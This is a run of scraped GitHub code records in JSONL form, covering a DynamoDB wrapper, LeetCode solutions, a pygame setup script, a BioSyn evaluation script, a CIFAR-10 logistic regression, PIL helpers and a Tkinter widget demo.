return int(o)\n return super(DecimalEncoder, self).default(o)\n\nclass DatabaseManager:\n \n \"\"\"\n DatabaseManager:\n Singleton wrapper for DatabaseConnection\n \"\"\"\n\n instance = None\n debug = False\n\n @staticmethod\n def getInstance():\n \"\"\"Get the instance of DatabaseConnection\"\"\"\n if DatabaseManager.instance is None:\n DatabaseManager.__initializeInstance()\n \n return DatabaseManager.instance\n\n @staticmethod\n def __initializeInstance():\n env = os.getenv('DB_ENV', 'local')\n if env != 'prod' and env != 'local':\n env = 'local'\n\n DatabaseManager.instance = DatabaseManager.__DatabaseConnection(env)\n\n @staticmethod\n def toggleDebugMessages(debug):\n if DatabaseManager.instance is None:\n DatabaseManager.__initializeInstance()\n\n DatabaseManager.instance.toggleDebugMessages(debug)\n\n class __DatabaseConnection:\n \n \"\"\"\n DatabaseConnection:\n Handles interactions with an AWS DynamoDB instance.\n \"\"\"\n\n def __init__(self, env, debug=False):\n self.dynamoDb = boto3.resource('dynamodb', endpoint_url=config.dbenv[env]['endpoint_url'], region_name='ca-central-1')\n self.env = env # used to check permissions with deleting tables\n self.debug = debug\n\n def toggleDebugMessages(self, debug):\n self.debug = debug\n\n def log(self, *content):\n if self.debug:\n print(*content)\n\n def get_table(self, table_name):\n \"\"\"\n Returns a table object for the given table_name.\n *Note: this table might not exist. Use table_exists before get_table.\n \"\"\"\n return self.dynamoDb.Table(table_name)\n\n def table_exists(self, table_name):\n \"\"\"\n Checks if a table with the given name exists.\n Returns true if a table with the given table_name exists, false otherwise,\n \"\"\"\n return self.get_table(table_name) in self.dynamoDb.tables.all()\n\n def create_table(self, table_name):\n \"\"\"\n Creates a table with the given name.\n The table's key will be 'id' with type 'Number'.\n Returns:\n true if the table was created.\n false if the table existed before or if the table failed to be created.\n \"\"\"\n \n if self.table_exists(table_name):\n self.log('Table:', table_name,' already exists!')\n return False\n table = self.dynamoDb.create_table(\n TableName=table_name,\n KeySchema=[\n {\n 'AttributeName': 'id',\n 'KeyType': 'HASH'\n }\n ],\n AttributeDefinitions=[\n {\n 'AttributeName': 'id',\n 'AttributeType': 'N'\n },\n ],\n ProvisionedThroughput={\n 'ReadCapacityUnits': config.read_capacity_units,\n 'WriteCapacityUnits': config.write_capacity_units\n }\n )\n\n success = self.table_exists(table_name)\n\n if success:\n self.log('Table',table_name,'created!')\n\n return success\n\n def delete_table(self, table_name):\n \"\"\"\n Deletes the table with the given name.\n\n Returns:\n 0: Successfully deleted the table.\n -1: Not allowed to delete the table.\n -2: Table does not exist.\n -3: Other error.\n \"\"\"\n if self.env == 'prod':\n self.log('You can\\'t delete a database in prod')\n return -1\n elif not self.table_exists(table_name):\n self.log('Table:', table_name, 'does not exist!')\n return -2\n else:\n try:\n self.log('Deleting table:', table_name)\n\n self.get_table(table_name).delete()\n time.sleep(5) #allow for deletion\n\n self.log('Table:', table_name, 'deleted!')\n return 0\n except ClientError as e:\n print('Failed to delete table:', table_name)\n print('Error:', e.response['Error']['Message'])\n return -3\n\n def get_item(self, table_name, key):\n \"\"\" Gets the item with the given key from the given table \"\"\"\n try:\n response = 
self.get_table(table_name).get_item(\n Key={\n 'id': key\n }\n )\n return response.get('Item')\n\n except ClientError as e:\n print('Failed to get item:', key)\n print('Error:', e.response['Error']['Message'])\n\n def put_item(self, table_name, item):\n \"\"\"\n If an item with no id attribute or an id of -1, this will create a new item.\n If item already exists (same key), then this will delete and create a new item.\n \"\"\"\n\n #This is a hack\n #if item doesn't have an idea, it tries to get the next available id\n #should probably change the id in that case to something we can determine on our own\n if not 'id' in item or item['id'] == -1:\n item['id'] = self.get_max_primarykey(table_name)\n\n try:\n response = self.get_table(table_name).put_item(\n Item=item\n )\n return response['ResponseMetadata']['HTTPStatusCode'] == 200\n except ClientError as e:\n print('Failed to put item:', item)\n print('Error:', e.response['Error']['Message'])\n\n def update_item(self, table_name):\n #TODO: Joshua Klassen-implement this function\n return\n\n #TODO: Joshua Klassen-test this\n def batch_write(self, table_name, items):\n \"\"\" Write items in a batch \"\"\"\n if self.table_exists(table_name):\n \n table = self.get_table(table_name)\n with table.batch_writer() as batch:\n for item in items:\n batch.put_item(Item=item)\n return True\n\n def soft_delete_item(self, table_name, key):\n \"\"\"\n Soft delete item with the given key from the given table\n by setting isDeleted = 1\n \"\"\"\n\n table = self.get_table(table_name)\n response = table.update_item(\n Key={\n 'id': key\n },\n UpdateExpression='SET deleted = :softDelete',\n ExpressionAttributeValues={\n ':softDelete': 1\n }\n )\n return response['ResponseMetadata']['HTTPStatusCode'] == 200\n\n def delete_item(self, table_name, key):\n \"\"\" Delete item with the given key from the given table \"\"\"\n table = self.get_table(table_name)\n response = table.delete_item(\n Key={'id': key}\n )\n return response['ResponseMetadata']['HTTPStatusCode'] == 200\n\n def scan(self, table_name):\n \"\"\" \n Scans the entire database \n This is a costly action, use carefully\n \"\"\"\n\n if self.table_exists(table_name):\n response = self.get_table(table_name).scan()\n\n return response.get('Items')\n\n def get_max_primarykey(self, table_name):\n table = self.get_table(table_name)\n\n response = table.scan(\n ProjectionExpression=\"#id\",\n ExpressionAttributeNames={ \"#id\": \"id\", }\n )\n\n MaxValue = 0\n for item in response['Items']:\n key = item['id']\n MaxValue = max(key, MaxValue)\n\n return MaxValue + 1\n\n def dynamodbItem_to_string(self, item):\n \"\"\" Convert an item from .get_item() to a string \"\"\"\n return json.dumps(item, indent=4, cls=DecimalEncoder)\n\n def get_item_as_string(self, table_name, key):\n \"\"\" Wraps .get_item() to return a string \"\"\"\n return self.dynamodbItem_to_string(self.get_item(table_name, key))\n\n #TODO: Joshua Klassen: determine if this should be the default behaviour\n def get_item_as_json(self, table_name, key):\n \"\"\" Wraps .get_item() to return a json object \"\"\"\n return json.loads(self.get_item_as_string(table_name, key))\n\n #TODO: Joshua Klassen: determine if this should be the default behaviour\n def scan_as_json(self, table_name):\n items = self.scan(table_name)\n response = []\n for item in items:\n response.append(json.loads(json.dumps(item, cls=DecimalEncoder)))\n \n return response\n\n def scan_as_json_with_criteria(self, table_name, column, value):\n items = self.scan(table_name)\n response = 
[]\n for item in items:\n if column in item and item[column] == value:\n response.append(json.loads(json.dumps(item, cls=DecimalEncoder)))\n return response","repo_name":"KieranL/Chow-Me-In","sub_path":"server/chowmein/database/database_manager.py","file_name":"database_manager.py","file_ext":"py","file_size_in_byte":10130,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"70926700962","text":"class TrieNode:\n def __init__(self):\n self.children = {}\n self.is_word = False\n def construct(words):\n root = TrieNode()\n for word in words:\n curr = root\n for c in word:\n if c not in curr.children:\n curr.children[c] = TrieNode()\n curr = curr.children[c]\n curr.is_word = True\n \n return root\n \n \nclass Solution:\n def indexPairs(self, text: str, words: List[str]) -> List[List[int]]:\n root = TrieNode.construct(words)\n \n res = []\n for i in range(len(text)):\n curr = root\n \n for j in range(i, len(text)):\n if text[j] in curr.children:\n curr = curr.children[text[j]]\n else:\n break\n if curr.is_word:\n res.append([i,j])\n \n return res\n \n ","repo_name":"hogilkim/leetcode","sub_path":"1065. Index Pairs of a String.py","file_name":"1065. Index Pairs of a String.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16372656742","text":"a=input()\nn=len(a)\n\nfor i in range(1< int:\n\n # monotonic stack solution\n result = 0\n nums = [float('inf')] + nums + [float('inf')]\n stack = [0]\n for i in range(len(nums)):\n while nums[stack[-1]] < nums[i]:\n idx = stack.pop()\n result += nums[idx] * (i-idx) * (idx-stack[-1])\n stack.append(i)\n nums[0], nums[-1] = -float('inf'), -float('inf')\n stack = [0]\n for i in range(len(nums)):\n while nums[stack[-1]] > nums[i]:\n idx = stack.pop()\n result -= nums[idx] * (i-idx) * (idx-stack[-1])\n stack.append(i)\n return result\n\n # brute force O(n**2)\n #\n # result = 0\n # for left in range(len(nums) - 1):\n # mn = mx = nums[left]\n # for right in range(left + 1, len(nums)):\n # num = nums[right]\n # if num < mn:\n # mn = num\n # if num > mx:\n # mx = num\n # result += (mx - mn)\n # return result\n\n # little optimized but still O(n**2)\n #\n # result = 0\n # max_right = len(nums)\n # fast = False\n # mn = mx = 0\n # for left in range(len(nums) - 1):\n # cur_mn = cur_mx = nums[left]\n # mn_idx = mx_idx = left\n # if fast and left > min_right:\n # fast = False\n # max_right = len(nums)\n # if fast:\n # result += (len(nums) - max_right) * (mx - mn)\n # for right in range(left + 1, max_right):\n # num = nums[right]\n # if num < cur_mn:\n # cur_mn = num\n # mn_idx = right\n # if num > cur_mx:\n # cur_mx = num\n # mx_idx = right\n # result += (cur_mx - cur_mn)\n # if not fast:\n # fast = True\n # mn = cur_mn\n # mx = cur_mx\n # max_right = max(mn_idx, mx_idx)\n # min_right = min(mn_idx, mx_idx)\n # return result\n\n\n\nstart_time = time()\n\n# Input: nums = [1,2,3]\n# Output: 4\n# Explanation: The 6 subarrays of nums are the following:\n# [1], range = largest - smallest = 1 - 1 = 0\n# [2], range = 2 - 2 = 0\n# [3], range = 3 - 3 = 0\n# [1,2], range = 2 - 1 = 1\n# [2,3], range = 3 - 2 = 1\n# [1,2,3], range = 3 - 1 = 2\n# So the sum of all ranges is 0 + 0 + 0 + 1 + 1 + 2 = 4.\n\n_nums = [4, -2, -3, 4, 1]\n# Input: nums = [4,-2,-3,4,1]\n# Output: 59\n# Explanation: The sum of all subarray ranges of nums is 59.\n\nprint(Solution().subArrayRanges(_nums))\n\nprint(\"--- %s seconds ---\" % (time() - 
start_time))\n","repo_name":"Sadomtsevvs/Leetcode","sub_path":"2104. Sum of Subarray Ranges.py","file_name":"2104. Sum of Subarray Ranges.py","file_ext":"py","file_size_in_byte":2827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"169011470","text":"import pygame\nfrom system_files.save.save import SAVE\n\npygame.init()\n\nscreen= pygame.display.set_mode((0, 0), pygame.FULLSCREEN)\nWINDOW_WIDTH, WINDOW_HEIGHT = screen.get_size()\nclock = pygame.time.Clock()\npygame.display.set_caption('Title')\nicon = pygame.image.load(\"system_files\\\\sprite\\\\icon.ico\")\npygame.display.set_icon(icon)\nRUNNING=1\nwidth = 1920\nheight = 1080\n\nSCREENING = pygame.image.load(\"system_files\\\\sprite\\\\scr.png\")\nSCREEN_TOLERANCE = 10\n\n#saved data for cross communication\n\ndata={\n \"WINDOW_HEIGHT\" : WINDOW_HEIGHT,\n \"WINDOW_WIDTH\" : WINDOW_WIDTH,\n \"STATE\" : \"PROGRAM\",\n \"SCREEN\" : 100\n}\nSAVE(\"\",data,\"cross.txt\")\n","repo_name":"Vengeful-Pancake/Cap","sub_path":"system_files/initial.py","file_name":"initial.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"27143820243","text":"a = int(input())\nb = int(input())\nc = list(map(int, input().split()))\nc = sorted(c, reverse=True)\nres = 0\nfor i in range(b):\n if(a <= 1):\n break\n while(True):\n if(a < int(c[i])):\n break\n res = res + a / int(c[i])\n a = a / int(c[i])\nprint(res)","repo_name":"HwangHunJo/solved.ac","sub_path":"class1+/엄청난 부자.py","file_name":"엄청난 부자.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"40158979115","text":"import argparse\nimport logging\nimport os\nimport json\nfrom tqdm import tqdm\nfrom utils import (\n evaluate\n)\nfrom src.biosyn import (\n DictionaryDataset,\n QueryDataset,\n BioSyn\n)\nLOGGER = logging.getLogger()\n\ndef parse_args():\n \"\"\"\n Parse input arguments\n \"\"\"\n parser = argparse.ArgumentParser(description='BioSyn evaluation')\n\n # Required\n parser.add_argument('--model_name_or_path', required=True, help='Directory for model')\n parser.add_argument('--dictionary_path', type=str, required=True, help='dictionary path')\n parser.add_argument('--data_dir', type=str, required=True, help='data set to evaluate')\n\n # Run settings\n parser.add_argument('--use_cuda', action=\"store_true\")\n parser.add_argument('--topk', type=int, default=20)\n parser.add_argument('--score_mode', type=str, default='hybrid', choices=['hybrid','dense','sparse'])\n parser.add_argument('--output_dir', type=str, default='./output/', help='Directory for output')\n parser.add_argument('--filter_composite', action=\"store_true\", help=\"filter out composite mention queries\")\n parser.add_argument('--filter_duplicate', action=\"store_true\", help=\"filter out duplicate queries\")\n parser.add_argument('--save_predictions', action=\"store_true\", help=\"whether to save predictions\")\n\n # Tokenizer settings\n parser.add_argument('--max_length', default=25, type=int)\n \n args = parser.parse_args()\n return args\n \ndef init_logging():\n LOGGER.setLevel(logging.INFO)\n fmt = logging.Formatter('%(asctime)s: [ %(message)s ]',\n '%m/%d/%Y %I:%M:%S %p')\n console = logging.StreamHandler()\n console.setFormatter(fmt)\n LOGGER.addHandler(console)\n\ndef load_dictionary(dictionary_path): \n dictionary = DictionaryDataset(\n dictionary_path = 
dictionary_path\n )\n return dictionary.data\n\ndef load_queries(data_dir, filter_composite, filter_duplicate):\n dataset = QueryDataset(\n data_dir=data_dir,\n filter_composite=filter_composite,\n filter_duplicate=filter_duplicate\n )\n return dataset.data\n \ndef main(args):\n init_logging()\n print(args)\n\n # load dictionary and data\n eval_dictionary = load_dictionary(dictionary_path=args.dictionary_path)\n eval_queries = load_queries(\n data_dir=args.data_dir,\n filter_composite=args.filter_composite,\n filter_duplicate=args.filter_duplicate\n )\n\n biosyn = BioSyn(\n max_length=args.max_length,\n use_cuda=args.use_cuda\n )\n biosyn.load_model(\n model_name_or_path=args.model_name_or_path,\n )\n \n result_evalset = evaluate(\n biosyn=biosyn,\n eval_dictionary=eval_dictionary,\n eval_queries=eval_queries,\n topk=args.topk,\n score_mode=args.score_mode\n )\n \n LOGGER.info(\"acc@1={}\".format(result_evalset['acc1']))\n LOGGER.info(\"acc@5={}\".format(result_evalset['acc5']))\n \n if args.save_predictions:\n output_file = os.path.join(args.output_dir,\"predictions_eval.json\")\n with open(output_file, 'w') as f:\n json.dump(result_evalset, f, indent=2)\n\nif __name__ == '__main__':\n args = parse_args()\n main(args)\n","repo_name":"dmis-lab/BioSyn","sub_path":"eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":3212,"program_lang":"python","lang":"en","doc_type":"code","stars":148,"dataset":"github-code","pt":"54"} +{"seq_id":"7606264290","text":"import os\nimport random\nfrom collections import deque\nfrom typing import List, Tuple\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport torchvision\nfrom PIL import Image\nfrom sklearn.manifold import TSNE\nfrom torch.utils.data import DataLoader, Dataset\nfrom torch.utils.data.sampler import SubsetRandomSampler\nfrom tqdm import tqdm\n\nfrom image_recognition import cifar_dir\n\n\ndef generate_subset_indices_pair(\n dataset: Dataset, ratio: float, random_seed: int = 0\n) -> Tuple[List[int], List[int]]:\n \"\"\"データセットを2分割するインデックスを格納した2つのリストを返す。\n\n Args:\n dataset (Dataset): 2つに分割するデータセット\n ratio (float): 分割した最初のセットに含めるデータ数を示す割合\n random_seed: データセットをランダムに分割するための乱数を生成するシード値\n Returns:\n Tuple[List[int], List[int]]: それぞれ2つのサブセットに含めるデータセットに含まれるデータ\n のインデックスを格納したタプル\n \"\"\"\n # サブセットの大きさを計算\n size = int(len(dataset) * ratio)\n indices = list(range(len(dataset)))\n # 二つのセットに分ける前にシャッフル\n random.seed(random_seed)\n random.shuffle(indices)\n # セット1とセット2のサンプルのインデックスに分割\n indices1, indices2 = indices[:size], indices[size:]\n return indices1, indices2\n\n\ndef transform(\n image: Image.Image, channel_mean: np.ndarray = None, channel_std: np.ndarray = None\n) -> np.ndarray:\n \"\"\"画像を正規化する。\n\n Args:\n image (Image.Image): 正規化する画像\n channel_mean (np.ndarray): 各次元のデータセット全体の平均(入力次元)\n channel_std (np.ndarray): 各次元のデータセット全体の標準偏差(入力次元)\n Returns:\n np.ndarray: 正規化された画像\n \"\"\"\n # 画像をNumPy配列に変換\n # img.shape: (32, 32, 3)\n image = np.asarray(image, dtype=\"float32\")\n # (32, 32. 
3)の画像を3072次元のベクトルに変換\n # 3072 = 32 * 32 * 3\n x = image.flatten()\n # 各次元をデータセット全体の平均と標準偏差で正規化\n if channel_mean is not None and channel_std is not None:\n x = (x - channel_mean) / channel_std\n return x\n\n\ndef calculate_dataset_statistics(dataset: Dataset) -> Tuple[float, float]:\n \"\"\"各次元のデータセット全体の平均と標準偏差を計算する。\n\n Args:\n dataset (Dataset): 平均と標準偏差を計算するデータセット\n Returns:\n Tuple[float, float]: 平均と標準偏差\n \"\"\"\n data = []\n for i in range(len(dataset)):\n img_flat = dataset[i][0]\n data.append(img_flat)\n # print(\"data[0].shape: \", data[0].shape) # (3072,)\n # 第0軸を追加して、第0軸でデータを連結\n data = np.stack(data)\n # print(f\"data.shape: {data.shape}\") # (50000, 3072)\n channel_mean = np.mean(data, axis=0)\n channel_std = np.std(data, axis=0)\n # print(f\"channel_mean.shape: {channel_mean.shape}\") # (3072,)\n # print(f\"channel_std.shape: {channel_std.shape}\") # (3072,)\n return channel_mean, channel_std\n\n\ndef target_transform(label: int, num_classes: int = 10) -> np.ndarray:\n \"\"\"ラベルをone-hotベクトルに変換する。\n\n Args:\n label (int): one-hotベクトルに変換するラベル\n num_classes (int): ラベルの数\n Returns:\n np.ndarray: one-hotベクトル\n \"\"\"\n # 数字 -> one-hotベクトル\n y = np.identity(num_classes)[label]\n # print(f\"y.shape: {y.shape}\")\n return y\n\n\nclass MultiClassLogisticRegression:\n \"\"\"多クラスロジスティック回帰モデル\"\"\"\n\n def __init__(self, dim_input: int, num_classes: int) -> None:\n \"\"\"イニシャライザ\n\n Args:\n dim_input (int): 入力次元数\n num_classes (int): 分類対象の物体クラスの数\n \"\"\"\n # パラメータをランダムに初期化\n self.weight = np.random.normal(scale=0.01, size=(dim_input, num_classes))\n self.bias = np.zeros(num_classes)\n # print(f\"weight.shape: {self.weight.shape}\") (3072, 10)\n # print(f\"bias.shape: {self.bias.shape}\") # (10,)\n\n def _softmax(self, x: np.ndarray) -> np.ndarray:\n \"\"\"ソフトマックス関数\n\n Args:\n x (np.ndarray): ソフトマックス関数の入力\n Returns:\n np.ndarray: ソフトマックス関数の出力\n \"\"\"\n return np.exp(x) / np.sum(np.exp(x), axis=1, keepdims=True)\n\n def predict(self, x: np.ndarray) -> np.ndarray:\n \"\"\"物体クラスの確立を予測する。\n\n Args:\n x (np.ndarray): 入力データ(バッチサイズ, 入力次元)\n Returns:\n np.ndarray: 物体クラスの確率(バッチサイズ, 物体クラスの数)\n \"\"\"\n y = np.matmul(x, self.weight) + self.bias\n y = self._softmax(y)\n # print(f\"y.shape: {y.shape}\")\n\n return y\n\n def update_parameters(\n self, x: np.array, y: np.ndarray, y_pred: np.ndarray, lr: float = 0.001\n ):\n # 出力と正解の誤差を計算\n diffs = y_pred - y\n # 勾配を使用してパラメーターを更新\n self.weight -= lr * np.mean(x[:, :, np.newaxis] * diffs[:, np.newaxis], axis=0)\n self.bias -= lr * np.mean(diffs, axis=0)\n\n def copy(self):\n \"\"\"モデルを複製する。\"\"\"\n # model_copy = self.__class__(*self.weight.shape)\n model_copy = MultiClassLogisticRegression(*self.weight.shape)\n model_copy.weight = self.weight.copy()\n model_copy.bias = self.bias.copy()\n return model_copy\n\n\nclass Config:\n \"\"\"ハイパーパラメーターとオプション\"\"\"\n\n def __init__(self) -> None:\n self.val_ratio = 0.2 # 検証に使う学習セット内のデータの割合\n self.num_epochs = 30 # 学習エポック数\n self.lrs = [1e-2, 1e-3, 1e-4] # 検証する学習率\n self.moving_avg = 20 # 移動平均で計算する損失と正確度の値の数\n self.batch_size = 32 # バッチサイズ\n self.num_workers = 2 # データローダーに使うCPUプロセスの数\n\n\nclass ImageTransformer:\n def __init__(self, channel_mean: float, channel_std: float) -> None:\n self.channel_mean = channel_mean\n self.channel_std = channel_std\n\n def __call__(self, image: Image.Image) -> np.ndarray:\n return transform(image, self.channel_mean, self.channel_std)\n\n\ndef evaluate_train_dataset():\n config = Config()\n # 入力データ正規化のために学習セットのデータを使って\n # 各次元の平均と標準偏差を計算\n dataset = torchvision.datasets.CIFAR10(\n 
root=cifar_dir(), train=True, download=True, transform=transform\n )\n channel_mean, channel_std = calculate_dataset_statistics(dataset)\n\n # 正規化を含めた画像整形関数の用意\n # img_transform = lambda x: transform(x, channel_mean, channel_std)\n # pickleでモデルを保存するため、lambda式を使用できないためコメントアウト\n # 代わりにImageTransformerクラスを定義して使用\n # img_transform = img_transform_wrapper(channel_mean, channel_std)\n\n # 学習、評価セットの用意\n train_dataset = torchvision.datasets.CIFAR10(\n root=cifar_dir(),\n train=True,\n download=True,\n # transform=img_transform,\n transform=ImageTransformer(channel_mean, channel_std),\n target_transform=target_transform,\n )\n test_dataset = torchvision.datasets.CIFAR10(\n root=cifar_dir(),\n train=False,\n download=True,\n # transform=img_transform,\n transform=ImageTransformer(channel_mean, channel_std),\n target_transform=target_transform,\n )\n # 学習・検証セットへ分割するためのインデックス集合の生成\n val_set, train_set = generate_subset_indices_pair(train_dataset, config.val_ratio)\n print(f\"学習セットのサンプル数: {len(train_set)}\") # 40000\n print(f\"検証セットのサンプル数: {len(val_set)}\") # 10000\n print(f\"テストセットのサンプル数: {len(test_dataset)}\") # 10000\n\n # インデックス集合から無作為にインデックスをサンプルするサンプラー\n train_sampler = SubsetRandomSampler(train_set)\n # DataLoaderを生成\n train_loader = DataLoader(\n train_dataset,\n batch_size=config.batch_size,\n num_workers=config.num_workers,\n sampler=train_sampler,\n )\n val_loader = DataLoader(\n train_dataset,\n batch_size=config.batch_size,\n num_workers=config.num_workers,\n sampler=val_set,\n )\n test_loader = DataLoader(\n test_dataset, batch_size=config.batch_size, num_workers=config.num_workers\n )\n\n # 検証セットの結果による最良モデルの保存用変数\n val_loss_best = float(\"inf\")\n model_best = None\n for lr in config.lrs:\n # 多クラスロジスティック回帰モデルの生成\n print(f\"学習率: {lr}\") # 0.01, 0.001, 0.0001\n model = MultiClassLogisticRegression(32 * 32 * 3, len(train_dataset.classes))\n for epoch in range(config.num_epochs):\n with tqdm(train_loader) as pbar:\n pbar.set_description(f\"[エポック {epoch + 1}]\")\n # 移動平均計算用\n losses = deque()\n accuracies = deque()\n for x, y in pbar:\n # サンプルしたデータはPyTorchのTensorに\n # 変換されているのためNumPyデータに戻す\n x = x.numpy()\n y = y.numpy()\n y_pred = model.predict(x)\n # 学習データに対する目的関数と正確度を計算\n loss = np.mean(np.sum(-y * np.log(y_pred), axis=1))\n # Maxのインデックスは数字表現のクラスラベル\n accuracy = np.mean(\n np.argmax(y_pred, axis=1) == np.argmax(y, axis=1)\n )\n # 移動平均を計算して表示\n losses.append(loss)\n accuracies.append(accuracy)\n if len(losses) > config.moving_avg:\n losses.popleft()\n accuracies.popleft()\n pbar.set_postfix(\n {\"loss\": np.mean(losses), \"accuracy\": np.mean(accuracies)}\n )\n # パラメータを更新\n model.update_parameters(x, y, y_pred, lr=lr)\n # 検証セットを使って精度評価\n val_loss, val_accuracy = evaluate(val_loader, model)\n print(f\"検証: loss = {val_loss:.3f}, \" f\"accuracy = {val_accuracy:.3f}\")\n # より良い検証結果が得られた場合、モデルを記録\n if val_loss < val_loss_best:\n val_loss_best = val_loss\n model_best = model.copy()\n # テスト\n test_loss, test_accuracy = evaluate(test_loader, model_best)\n print(f\"テスト: loss = {test_loss:.3f}, \" f\"accuracy = {test_accuracy:.3f}\")\n\n\ndef evaluate(data_loader: DataLoader, model: MultiClassLogisticRegression):\n losses = []\n preds = []\n for x, y in data_loader:\n x = x.numpy()\n y = y.numpy()\n y_pred = model.predict(x)\n losses.append(np.sum(-y * np.log(y_pred), axis=1))\n preds.append(np.argmax(y_pred, axis=1) == np.argmax(y, axis=1))\n loss = np.mean(np.concatenate(losses))\n accuracy = np.mean(np.concatenate(preds))\n return loss, accuracy\n\n\n# `if __name__ == \"__main__\":`を追加\n# 
この条件を満たすときにのみ、train_eval関数を呼び出さないと、multiprocessingでRuntimeErrorが発生する。\n# RuntimeError:\n# An attempt has been made to start a new process before the\n# current process has finished its bootstrapping phase.\n#\n# This probably means that you are not using fork to start your\n# child processes and you have forgotten to use the proper idiom\n# in the main module:\n#\n# if __name__ == '__main__':\n# freeze_support()\n# ...\n#\n# The \"freeze_support()\" line can be omitted if the program\n# is not going to be frozen to produce an executable.\nif __name__ == \"__main__\":\n evaluate_train_dataset()\n","repo_name":"xjr1300/image_recognition","sub_path":"image_recognition/ch03_01_multi_class_logistic_regression.py","file_name":"ch03_01_multi_class_logistic_regression.py","file_ext":"py","file_size_in_byte":12688,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"31711994382","text":"\"\"\"\nModification from\nhttps://note.nkmk.me/en/python-pillow-concat-images/\n\"\"\"\nfrom PIL import Image\n\n\n# For Visulaization of cutouts\ndef get_concat_h_multi_resize(im_list, resample=Image.BICUBIC):\n\t\"\"\"\n\tconcat PIL images horizontally\n\n\t:param im_list: image array list\n\t:param resample: Image.BICUBIC\n\t:return: horizontally concatenated PIL Image\n\t\"\"\"\n\tmin_height = min(Image.fromarray(im).height for im in im_list)\n\tim_list_resize = [Image.fromarray(im).resize(\n\t\t(int(Image.fromarray(im).width * min_height / Image.fromarray(im).height), min_height), resample=resample)\n\t\tfor im in im_list]\n\ttotal_width = sum(im.width for im in im_list_resize)\n\tdst = Image.new('RGB', (total_width, min_height))\n\tpos_x = 0\n\tfor im in im_list_resize:\n\t\tdst.paste(im, (pos_x, 0))\n\t\tpos_x += im.width\n\treturn dst\n\n\ndef get_concat_v_multi_resize(im_list, resample=Image.BICUBIC):\n\t\"\"\"\n\tconcat PIL images Vertically\n\n\t:param im_list: image array list\n\t:param resample: Image.BICUBIC\n\t:return: Vertically concatenated PIL Image\n\t\"\"\"\n\tmin_width = min(im.width for im in im_list)\n\tim_list_resize = [im.resize((min_width, int(im.height * min_width / im.width)), resample=resample)\n\t for im in im_list]\n\ttotal_height = sum(im.height for im in im_list_resize)\n\tdst = Image.new('RGB', (min_width, total_height))\n\tpos_y = 0\n\tfor im in im_list_resize:\n\t\tdst.paste(im, (0, pos_y))\n\t\tpos_y += im.height\n\treturn dst","repo_name":"kimdanny/Deep-Learning-cw","sub_path":"task2/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"28544672778","text":"from tkinter.ttk import *\nfrom tkinter import *\nfrom tkinter import scrolledtext\nfrom tkinter import messagebox\nroot = Tk()\nroot.geometry('1000x1000')\nroot.title('Documentation')\nroot.iconbitmap('/home/bc2113449/projects/MadLibs/hyd.gif')\n#######################WIDGETS################################\n#----label\nl1=Label(root, text= 'Hello world!' 
, font = 'arial 30 bold')\nl1.grid(row=0,column=0)\n#----button\nb1=Button(root,text=\"Submit\")\nb1.grid(row=0,column=1)\n#----we can also add button click event\ndef clicked():\n b2.configure(text=\"You clicked on enter!!\")\nb2=Button(root,text=\"Enter\",bg=\"red\",fg=\"white\",command=clicked,padx=50,pady=50)\nb2.grid(row=0,column=3)\n#----Entry(used to take input from user)\nl7=Label(root, text= 'Entry class' , font = 'arial 10 bold')\nl7.grid(row=1,column=0)\ntxt=Entry(root,width=20) ## we can also add the fg,bg colour and borderwidth\ntxt.insert(1,\"Enter your name\")\ntxt.grid(row=1,column=1)\ndef clicked():\n res=\"Welcome \"+txt.get()\n b3.configure(text=res)\nb3=Button(root,text=\"Click here to see magic\",bg=\"red\",fg=\"white\",command=clicked)\nb3.grid(row=1,column=2)\n#---- Combobox(dropdown box)\nl6=Label(root, text= 'Combobox' , font = 'arial 10 bold')\nl6.grid(row=2,column=0)\ncombo=Combobox(root)\ncombo['values']=(\"india\",\"pak\",\"bangladesh\",\"srilanka\")\ncombo.current(0)\ncombo.grid(row=2,column=1)\n#----Check button \nl5=Label(root, text= 'Check boxes' , font = 'arial 10 bold')\nl5.grid(row=3,column=0)\nchk_state=BooleanVar() #here BooleanVar() is tkinter variable not the python variable\nchk_state.set(True)\nc1=Checkbutton(root,text=\"I have read all the conditions\",var=chk_state)\nc1.grid(row=3,column=1)\n#----Radio button;\nl4=Label(root, text= 'RadioButtons' , font = 'arial 10 bold')\nl4.grid(row=4,column=0)\nrad1 = Radiobutton(root,text=\"Python\",value=1)\nrad2 = Radiobutton(root,text=\"Java\",value=2)\nrad3 = Radiobutton(root,text=\"Scalar\",value=3)\nrad1.grid(column=1,row=4)\nrad2.grid(column=2,row=4)\nrad3.grid(column=3,row=4)\n#----ScrolledText\nl4=Label(root, text= 'Scrolled text' , font = 'arial 10 bold')\nl4.grid(row=5,column=0)\nstxt=scrolledtext.ScrolledText(root,width=20,height=10)\nstxt.insert(INSERT,\"____________________\")\nstxt.insert(INSERT,\"Enter your text here\")\nstxt.insert(INSERT,\"____________________\")\nstxt.grid(row=5,column=1)\n#----MessageBox\nl3=Label(root, text= 'MessageInfo' , font = 'arial 10 bold')\nl3.grid(row=6,column=0)\ndef clicked1():\n messagebox.showinfo('Message title',\"Message content\")\nb4=Button(root,text=\"click here for message\",command=clicked1)\nb4.grid(row=6,column=1)\n#----Spinbox\nl2=Label(root, text= 'Spinbox' , font = 'arial 10 bold')\nl2.grid(row=7,column=0)\nspin=Spinbox(root,from_=0,to_=20,width=5)\nspin.grid(row=7,column=1)\n\n##########Geometry Manager Classes\n# 1.pack()--organizes the widgets in block,occupies the entire width\n# 2.grid()--organizes the widgets in table like structure\n# 3.place()--organizes the widgets at specific position that we 